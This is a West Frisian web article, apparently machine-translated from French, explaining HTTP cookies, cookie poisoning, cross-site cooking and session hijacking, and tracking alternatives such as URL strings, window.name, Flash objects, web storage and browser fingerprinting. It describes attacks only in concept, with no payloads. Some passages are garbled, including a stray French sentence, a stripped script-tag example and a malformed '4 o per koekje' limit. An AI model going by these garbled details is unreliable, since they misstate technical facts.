Set-Cookie: RMID=732423sdfs73242; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.exemple.net; HttpOnly

As de browser sa'n koekje ûntfangt, moat it normaal brûke yn 'e folgjende HTTP-útwikseling, mar sûnder it sichtber te meitsjen foar skripts útfierd op' e kliïntside. De flagge fan HttpOnly is gjin diel fan in offisjele technyske spesifikaasje, en wurdt net ymplementearre yn alle browsers. Tink derom dat d'r op it stuit gjin manier is om it lêzen en skriuwen fan sesjekoekjes te foarkommen troch de metoade XMLHTTPrequest.

Modifikaasje fan ynhâld: in oanfaller stjoert in ûnjildich koekje nei in server, mooglik makke fan in jildich koekje dat troch de server ferstjoerd is.

Sadree't de koekjes opslein wurde moatte en ûnferoare weromjûn wurde nei de tsjinner, kin in oanfaller de wearde fan de koekjes wizigje foardat se weromstjoerd wurde nei de tsjinner. Bygelyks, as in koekje de totale wearde befettet dy't de brûker moat betelje foar de items dy't yn 'e winkelkarre pleatst binne, sil it feroarjen fan dizze wearde de tsjinner bleatstelle oan it risiko dat de oanfaller minder wurdt dan de startpriis. It proses fan it feroarjen fan de wearde fan cookies wurdt neamd koekje fergiftiging en kin brûkt wurde nei cookie stellerij om de oanfal persistent te meitsjen.

Yn 'e cookie-override-metoade brûkt de oanfaller in blêderflater om in ûnjildich koekje nei de tsjinner te stjoeren.

De measte websiden bewarje lykwols allinich in sesje-ID - in willekeurich oanmakke unyk nûmer dat brûkt wurdt om de sesjebrûker te identifisearjen - yn it koekje sels, wylst alle oare ynformaasje op 'e tsjinner wurdt opslein. Yn dit gefal is dit probleem foar in grut part oplost.

Elke side wurdt ferwachte dat se har eigen koekjes hawwe, dus ien side soe net by steat wêze moatte om cookies te feroarjen of oan te meitsjen dy't ferbûn binne mei in oare side. In befeiligingsfout fan 'e webbrowser kin skealike siden tastean dizze regel te brekken. De eksploitaasje fan sa'n flater wurdt faak oantsjutten as cross-site cooking. It doel fan sokke oanfallen kin sesje-ID-stellerij wêze.

Brûkers moatte de lêste ferzjes fan webbrowsers brûke wêryn dizze kwetsberens praktysk útskeakele binne.

Konflikt steat tusken client en tsjinner

It brûken fan cookies kin in tsjinspraak generearje tusken de steat fan de klant en de steat opslein yn it koekje. As de brûker in koekje krijt en op de knop "Werom" fan 'e browser klikt, is de tastân fan 'e browser oer it algemien net itselde as foar dizze oankeap. Bygelyks, as de koer fan in online winkel is makke mei cookies, kin de ynhâld fan 'e koer net feroarje as de brûker weromkomt nei de blêderskiednis: as de brûker op in knop drukke om in artikel yn syn koer ta te foegjen en klikt op de "Weromgean" " knop, it artikel bliuwt yn dizze. Dit kin net de bedoeling wêze fan de brûker, dy't grif de tafoeging fan it artikel wol annulearje wol. Dit kin liede ta ûnbetrouberens, betizing en bugs. Dat webûntwikkelders moatte bewust wêze fan dit probleem en maatregels útfiere om situaasjes lykas dizze te behanneljen.

Persistente koekjes binne bekritisearre troch saakkundigen foar privacyfeiligens omdat se net pland binne om gau genôch te ferfallen, wêrtroch websiden brûkers kinne folgje en har profyl oer de tiid bouwe. Dit aspekt fan cookies makket ek diel út fan it probleem mei sesjekaping, om't in stellen persistent koekje brûkt wurde kin om in brûker foar in flinke perioade foar te dwaan.

Om ek te lêzen: GAFAM: wa binne se? Wêrom binne se (soms) sa eng?

Alternativen foar cookies

Guon operaasjes dy't kinne wurde útfierd mei koekjes, kinne ek wurde útfierd mei oare meganismen dy't koekjes omgeane of wiske koekjes opnij oanmeitsje, wat privacyproblemen op deselde manier skept (of soms slimmer, om't dan ûnsichtber is) as koekjes.

IP-adres

Brûkers kinne wurde folge mei it IP-adres fan 'e kompjûter dy't de side ropt. Dizze technyk is beskikber sûnt de yntroduksje fan it World Wide Web, as siden wurde ynladen freget de tsjinner it IP-adres fan 'e kompjûter mei de browser of proxy, as gjinien wurdt brûkt. De tsjinner kin dizze ynformaasje folgje of der binne cookies yn gebrûk of net. Dizze adressen binne lykwols typysk minder betrouber by it identifisearjen fan in brûker dan koekjes, om't kompjûters en proxy's kinne wurde dield troch meardere brûkers, en deselde kompjûter kin in oar IP-adres krije op elke wurksesje (lykas c faaks it gefal foar tillefoanferbiningen) .

Tracking troch IP-adressen kin yn guon situaasjes betrouber wêze, lykas breedbânferbiningen dy't itselde IP-adres foar in lange tiid behâlde, salang't de macht oan is.

Guon systemen lykas Tor binne ûntworpen om de anonymiteit fan it ynternet te behâlden en it folgjen fan IP-adres ûnmooglik of ûnpraktysk te meitsjen.

URL

In krekter technyk is basearre op it ynbêden fan ynformaasje yn URL's. It query string diel fan 'e URL is ien technyk dy't typysk wurdt brûkt foar dit doel, mar oare dielen kinne ek brûkt wurde. Sawol de Java-serverlet as de PHP-sesjemeganismen brûke dizze metoade as cookies net ynskeakele binne.

Dizze metoade omfettet de webtsjinner dy't string-oanfragen taheakket oan 'e keppelings fan' e webside dy't it draacht as it wurdt stjoerd nei de browser. As de brûker in keppeling folget, jout de browser de taheakke query-string werom nei de tsjinner.

Query-strings dy't foar dit doel brûkt wurde en cookies binne tige ferlykber, beide binne ynformaasje dy't willekeurich keazen is troch de tsjinner en weromjûn troch de browser. D'r binne lykwols wat ferskillen: as in URL mei in query-string opnij brûkt wurdt, wurdt deselde ynformaasje nei de tsjinner stjoerd. Bygelyks, as de foarkar fan in brûker kodearre binne yn in query-string fan in URL en de brûker stjoert dy URL nei in oare brûker fia e-mail, dan sil dy brûker ek dizze foarkar brûke kinne.

Oan 'e oare kant, as in brûker twa kear tagong hat ta deselde side, is d'r gjin garânsje dat deselde query-string beide kearen brûkt wurdt. As in brûker bygelyks de earste kear op in side komt fan in ynterne sideside en de twadde kear op deselde side komt fan in eksterne side, is de querystring relatyf oan de sideside typysk oars, wylst de cookies itselde binne .

Oare neidielen fan query-strings binne relatearre oan feiligens: it hâlden fan gegevens dy't in sesje identifisearje yn query-strings makket sesje-fixaasje-oanfallen, identifier-referinsjeoanfallen en oare eksploaten mooglik of ferienfâldiget. It trochjaan fan sesje-ID's as HTTP-koekjes is feiliger.

Ferburgen formulierfjild

Ien foarm fan sesje tracking, brûkt troch ASP.NET, is it brûken fan webformulieren mei ferburgen fjilden. Dizze technyk is tige ferlykber mei it brûken fan URL-fraachstrings om ynformaasje te dragen en hat deselde foardielen en neidielen; en as it formulier wurdt ferwurke mei de HTTP GET-metoade, wurde de fjilden eins diel fan 'e URL fan' e browser dy't it sil stjoere by it yntsjinjen fan it formulier. Mar de measte formulieren wurde ferwurke mei HTTP POST, wêrtroch't de formulierynformaasje, ynklusyf ferburgen fjilden, wurdt tafoege as in ekstra ynfier dy't gjin diel is fan 'e URL noch in koekje.

Dizze oanpak hat twa foardielen út in folgjen perspektyf: earst, it folgjen fan de ynformaasje pleatst yn de HTML boarnekoade en POST ynfier ynstee fan de URL sil tastean de gemiddelde brûker te mijen dit tracking; twadde, de sesje-ynformaasje wurdt net kopiearre as de brûker de URL kopiearret (om de side op skiif te bewarjen of fia e-post te stjoeren, bygelyks).

finster.namme

Alle gewoane webbrowsers kinne nochal in grutte hoemannichte gegevens opslaan (2MB oant 32MB) fia JavaSkript mei help fan 'e DOM's window.name-eigenskip. Dizze gegevens kinne brûkt wurde ynstee fan sesjecookies en wurde ek brûkt oer domeinen. De technyk kin wurde keppele mei JSON-objekten om in komplekse set fan sesjefariabelen oan 'e kant fan' e kliïnt op te slaan.

It neidiel is dat elk apart finster of ljepper yn earste ynstânsje in lege window.name hawwe sil; by it blêdzjen troch ljeppers (iepene troch de brûker) betsjut dit dat de ljeppers dy't yndividueel iepene binne gjin finsternamme hawwe. Derneist kin window.name brûkt wurde om besikers op ferskate siden te folgjen dy't in privacyprobleem kinne foarmje.

Yn guon opsichten kin dit feiliger wêze as koekjes, troch de net-belûken fan de tsjinner, sadat it net kwetsber is foar de netwurkoanfal fan sniffer-koekjes. As spesjale maatregels lykwols wurde nommen om de gegevens te beskermjen, is it kwetsber foar fierdere oanfallen, om't de gegevens beskikber binne fia oare siden dy't yn itselde finster iepene binne.

HTTP-ferifikaasje

It HTTP-protokol omfettet de basis protokollen foar tagongsferifikaasje en de digest foar tagongsferifikaasje, wêrtroch tagong ta in webside allinich mooglik makket as de brûker de brûkersnamme en wachtwurd hat jûn. As de tsjinner in sertifikaat freget om tagong te jaan ta in webside, freget de browser it fan 'e brûker en ienris krigen, bewarret de browser it en stjoert it yn alle folgjende HTTP-oanfragen. Dizze ynformaasje kin brûkt wurde om de brûker te folgjen.

Lokaal dielde objekt

As in blêder de Adobe Flash Player-plugin omfettet, is de lokale dielde objekten kin brûkt wurde foar itselde doel as cookies. Se kinne in oantreklike kar wêze foar webûntwikkelders om't:

  • de standertgrutte limyt foar in lokaal dielde objekt is 100 KB;
  • befeiligingskontrôles binne apart fan brûker-koekjeskontrôles (sadat lokale dielde objekten kinne wurde tastien as koekjes net binne).

Dit lêste punt, dat it belied foar cookiebehear ûnderskiedt fan dat fan Adobe's lokale dielde objekten stelt fragen op oangeande it behear troch de brûker fan syn privacy-ynstellings: hy moat him bewust wêze dat syn behear fan cookies gjin ynfloed hat op it behear fan lokale dielde objekten, en oarsom.

In oare krityk op dit systeem is dat it allinich kin wurde brûkt fia de Adobe Flash Player-plugin dy't proprietêr is en net in webstandert.

Persistinsje oan 'e kant fan' e klant

Guon webbrowsers stypje in skript-basearre persistinsjemeganisme, wêrtroch de side ynformaasje lokaal kin opslaan foar letter gebrûk. Internet Explorer, bygelyks, stipet oanhâldende ynformaasje yn browserskiednis, yn blêdwizers, yn in opmaak opslein yn XML, of direkt mei in webside opslein op skiif. Foar Microsoft Internet Explorer 5 is d'r in metoade foar brûkersgegevens beskikber fia DHTML-gedrach.

De W3C yntrodusearre yn HTML 5 in nije JavaSkript API foar gegevensopslach oan kliïntside neamd Webopslach en wie fan doel om cookies permanint te ferfangen. It is fergelykber mei cookies, mar mei sterk ferbettere kapasiteit en sûnder ynformaasje op te slaan yn 'e koptekst fan HTTP-oanfragen. De API lit twa soarten webopslach ta: lokale opslach en sesjeopslach, fergelykber mei persistente koekjes en sesjekoekjes (útsein dat sesjekoekjes ferrinne as de browser sletten wurdt wylst sesje opslach ferrinne as de ljepper is sletten), respektivelik. Webopslach wurdt stipe troch Mozilla Firefox 3.5, Google Chrome 5, Apple Safari 4, Microsoft Internet Explorer 8 en Opera 10.50.

In oar meganisme fertrout normaal op blêder-caching (yn it ûnthâld ynstee fan ferfarskje) mei JavaScript-programma's yn websiden. 

Bygelyks, in side kin de tag befetsje . La première fois que la page se charge, le programme exemple.js est aussi chargé. 

Op dit punt bliuwt it programma yn cache-ûnthâld en wurdt de besochte side net in twadde kear opnij laden. Dêrtroch, as it programma befettet in globale fariabele (Bygelyks var id = 3243242;), bliuwt dizze identifier jildich en kin wurde eksploitearre troch oare JavaSkript koade ienris de side wurdt laden wer, of ien kear in side keppele it programma wurdt laden. 

It grutte neidiel fan dizze metoade is dat de JavaScript globale fariabele statysk moat wêze, wat betsjut dat it net feroare of wiske wurde kin as in koekje.

webbrowser fingerprint

In browserfingerprint is ynformaasje sammele oer de konfiguraasjeynstellingen fan in browser foar identifikaasjedoelen. Dizze fingerprinten kinne brûkt wurde om in ynternetbrûker of in apparaat folslein of foar in part te identifisearjen, sels as cookies binne útskeakele.

Basisynformaasje fan webbrowserkonfiguraasje is al lang sammele troch websidepublyktsjinsten foar it doel fan it krekt mjitten fan minsklik webferkear en it opspoaren fan ferskate foarmen fan klikfraude. Mei help fan client-side skripttalen is folle krekter ynformaasje sammeljen no mooglik.

It konvertearjen fan dizze ynformaasje yn in bitstring produseart in apparaatfingerprint. Yn 2010 hat de Electronic Frontier Foundation (EFF) de entropy fan de fingerprint fan in browser mjitten om op syn minst te wêzen 18,1 bits, en dat wie foardat foarútgong yn canvas fingerprinting 5,7 bits tafoege oan dy entropy.

Koekjes yn in nutshell

Koekjes binne lytse tekstbestannen dy't troch de webblêder op 'e hurde skiif fan in websidebesiker bewarre wurde en dy't (ûnder oaren) brûkt wurde om ynformaasje oer de besiker of har reis troch de side op te nimmen. De webmaster kin sa de gewoanten fan in besiker werkenne en de presintaasje fan syn side foar elke besiker personalisearje; cookies meitsje it dan mooglik om te ûnthâlden hoefolle artikels op 'e thússide werjûn wurde of sels de oanmeldgegevens foar elke partikuliere partij te behâlden: as de besiker weromkomt op' e side, is it net mear nedich foar him om syn namme en wachtwurd yn te typen wurde werkend, sûnt se wurde automatysk lêzen yn it koekje.

In koekje hat in beheinde lifespan, ynsteld troch de side-ûntwerper. Se kinne ek ferrinne oan 'e ein fan' e sesje op 'e side, wat oerienkomt mei it sluten fan' e browser. Koekjes wurde in soad brûkt om it libben makliker te meitsjen foar besikers en se te presintearjen mei mear relevante ynformaasje. Mar spesjale techniken meitsje it mooglik om in besiker op ferskate siden te folgjen en sadwaande tige wiidweidige ynformaasje oer syn gewoanten te sammeljen en te kontrolearjen. Dizze metoade hat it gebrûk fan cookies in reputaasje jûn as in tafersjochtechnyk dy't de privacy fan besikers skeint, dy't spitigernôch oerienkomt mei de realiteit yn in protte gefallen fan gebrûk om net-technyske redenen of net respektearje fan brûkersferwachtingen. .

As antwurd op dizze legitime eangsten yntroduseart HTML 5 in nije JavaSkript API foar gegevensopslach op kliïntside neamd Web opslach, dy't folle feiliger is en mei gruttere kapasiteit, dy't as doel hat om cookies te ferfangen.

Opslach fan koekjes

Mei guon browsers is in koekje maklik te bewurkjen, in ienfâldige tekstbewurker lykas Notepad is genôch om syn wearden manuell te feroarjen.

Koekjes wurde oars bewarre ôfhinklik fan de browser:

  • Microsoft Internet Explorer bewarret elk koekje yn in oare triem;
  • mozilla Firefox bewarret al syn cookies yn ien triem;
  • Opera bewarret al syn koekjes yn ien bestân en fersiferet se (ûnmooglik om se te feroarjen, útsein yn 'e softwareopsjes);
  • Apple Safari bewarret al syn koekjes yn ien inkele .plist-útwreidingsbestân. Modifikaasje is mooglik, mar net heul maklik, útsein as jo troch de software-opsjes geane.

Browsers binne ferplichte om te stypjen in minima :

  • 300 tagelyk koekjes;
  • 4 o per koekje;
  • 20 cookies per host of domein.
[Totaal: 0 Betsjutte: 0]

Skreaun troch Resinsjes Bewurkers

It team fan saakkundige redakteuren besteget har tiid oan it ûndersykjen fan produkten, it útfieren fan praktyske tests, ynterviewe fan professionals yn 'e sektor, it besjen fan konsumintresinsjes, en it skriuwen fan al ús resultaten as in begryplike en wiidweidige gearfettings.

Leave in reaksje

Jo e-postadres wurdt net publisearre. Ferplichte fjilden binne markearre *

Wat tinksto?

384 punten
Omheech Downvote